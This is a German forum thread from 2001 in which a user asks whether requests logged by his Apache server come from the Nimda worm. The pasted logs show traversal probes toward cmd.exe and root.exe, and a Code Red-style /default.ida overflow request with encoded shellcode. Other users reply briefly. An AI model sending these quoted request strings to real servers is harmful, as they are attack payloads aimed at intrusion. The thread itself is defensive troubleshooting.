Heimnetzwerke - WIFI, LAN, Router und Co 16.506 Themen, 80.985 Beiträge

Verfolgung starten Optionen

Nimda oder was?

Nickel85 / 7 Antworten / Flachansicht Nickles

Auf meinem DSL-Rechner läuft der Apache WWW-Server.

Ich finde in der error.log sehr häufig folgende Zeilen (jeweils von ein und demselben Client, der zeitliche Abstand zwischen den Meldungen beträgt) 1-3 Sekunden.

Das sieht mir fast aus wie Nimda... - Isser das? Wenn nicht: was dann?

----------------------------------------------------------------------
File does not exist: c:/web/html/scripts/root.exe
File does not exist: c:/web/html/msadc/root.exe
File does not exist: c:/web/html/c/winnt/system32/cmd.exe
File does not exist: c:/web/html/d/winnt/system32/cmd.exe
File does not exist: c:/web/html/scripts/..%5c/winnt/system32/cmd.exe
File does not exist: c:/web/html/_vti_bin/..%5c/..%5c/..%5c/winnt/system32/cmd.exe
File does not exist: c:/web/html/_mem_bin/..%5c/..%5c/..%5c/winnt/system32/cmd.exe
File does not exist: c:/web/html/msadc/..%5c/..%5c/..%5c/..Á/..Á/..Á/winnt/system32/cmd.exe
File does not exist: c:/web/html/scripts/..Á/winnt/system32/cmd.exe
----------------------------------------------------------------------

Gruß

Nic


PS: C:/web/html/ ist das Root-Dir vom Apache...

bei Antwort benachrichtigen
Schliesse die Internetverbindung, danach sollte es aufören. Ist ein ... diavolino
Reconnect bringt nix, und es kommt ja von diversen IPs fast nur von 62er ... Nickel85
Nickel85 Nachtrag zu: „Nimda oder was?“
Optionen

Was ich nicht ganz so häufig, jedoch mit gewisser Regelmäßigkeit in der Access.log finde:

63.74.34.9 - - [09/Dec/2001:09:14:23 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 331

In der Error.log sieht das dann so aus:

[Sun Dec 09 09:14:23 2001] [error] [client 63.74.34.9] Client sent malformed Host header

Die IP ist niemals die selbe, diverse Adressräume sind vertreten...

Mir scheint, da probiert irgendein weitverbreiteter Virus (Nimda, Code Red oder weiß-der-Teufel-was) mit einem Hack der eigentlich Mickeysofts IIS zum Einsturz bringen soll, an meinen Apache dranzukommen :)))

Mich würd' allerdings schon interessieren, was für ein Virus das genau ist - und warum so viele Rechner davon befallen sind, Nimda hat ja eigentlich genug Staub aufgewirbelt, sodass jeder seinen Virenscanner upgedatet haben sollte...

bei Antwort benachrichtigen
Würde Dir dringend empfehlen Tiny Personal Firewall 2.0.15 zu installieren. ... Teletom
Was ich an deiner stelle tun würde, ist dein freigegebenes verzeichniss ... diavolino
ich habe vor kurzem das selbe gelesen.. PC INTERN. es war die rede vom wurm ... EtePetete
Erstens: Port 80 MUSS offen sein, sonst läuft mein Apache Web-Server net. ... Nickel85